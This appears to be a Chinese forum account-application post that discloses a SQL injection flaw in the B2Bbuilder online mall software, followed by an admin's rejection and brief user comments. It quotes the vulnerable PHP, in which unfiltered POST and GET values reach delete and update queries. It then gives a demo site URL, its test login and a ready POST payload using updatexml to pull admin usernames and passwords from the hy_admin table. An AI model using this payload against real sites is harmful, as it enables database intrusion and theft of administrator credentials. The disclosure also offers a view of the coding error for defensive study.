申 请 I D ： a630935072

1、申 请 I D ：   a630935072
2、个人邮箱：630935072@qq.com
3、原创技术文章：

好几年没上论坛了 以前的号没了 现在申请一个吧，记得那时候不用注册码的
既然要注册码了 就发表一个吧 下面文章开始吧 废话不多说

B2Bbuilder网上商城通用注入漏洞

漏洞目录: module\company\admin\business_info_list.php

<?php

$status=array('-1'=>lang_show('notpass'),'0'=>lang_show('wpass'),'1'=>lang_show('auditpass'));

if(isset($_GET['step']))

{

    if($_GET['step']=="del")

    {

       $db->query("delete from ".CERTIFICATION." where id='$_GET[deid]'");

       $sql="update ".COMPANY." set certification='0' wherecompany_id in (select company_id from ".CERTIFICATION." where id='$_GET[deid]')";

       $db->query($sql);

    }

}

if(isset($_POST['del']))

{

    $ids=implode(",",$_POST['del']);

    $sql="update ".CERTIFICATION." set statu=1 where id in($ids)";

    $db->query($sql);

    $sql="update ".COMPANY." set certification='1' wherecompany_id in (select company_id from ".CERTIFICATION." where id in ($ids))";

    $db->query($sql);

}

?>

以上为文件源码
我们可以看到源码中 del未能过滤导致造成sql注入


那么我们怎么来操作呢？

我们就可以直接构造注入语句了

http://democn.b2b-builder.com

账号密码 test test

构造url

http://democn.b2b-builder.com/main.php?m=company&s=admin/business_info_list

post数据包为

del[]=1)or updatexml(2,concat(0x7e,((select group_concat(user,0x5e,password) fromhy_admin))),0) %23&updateID=11&cc=1111

我们来观看下图 结果：

漏洞证明

Hmily

抱歉，未能达到申请要求，申请不通过，可以关注论坛官方微信（吾爱破解论坛），等待开放注册通知。

wsd10086

感觉没写完？

虚幻魔王

52什么时候抢乌云和360的生意了？这不科学啊。注册码好像官方有出啊，楼主玩这个的，不会连几十元都不舍得出吧。

小值是个小白

论坛就有直接赞助的注册码啊！

11111111

这不应该是乌云干的事吗

☆★☆☆

怎么最近这么多申请ID的，多少写点有技术含量的东西，这么简单的东西拿出来即什么作用，也没什么好学习的，多少破个高级点的软件也行啊

珍珠先生

高冷的不行，然后被H大瞬间打脸

wsbz112

不错，再接再厉~~~

nanzhu

貌似更应该去乌云。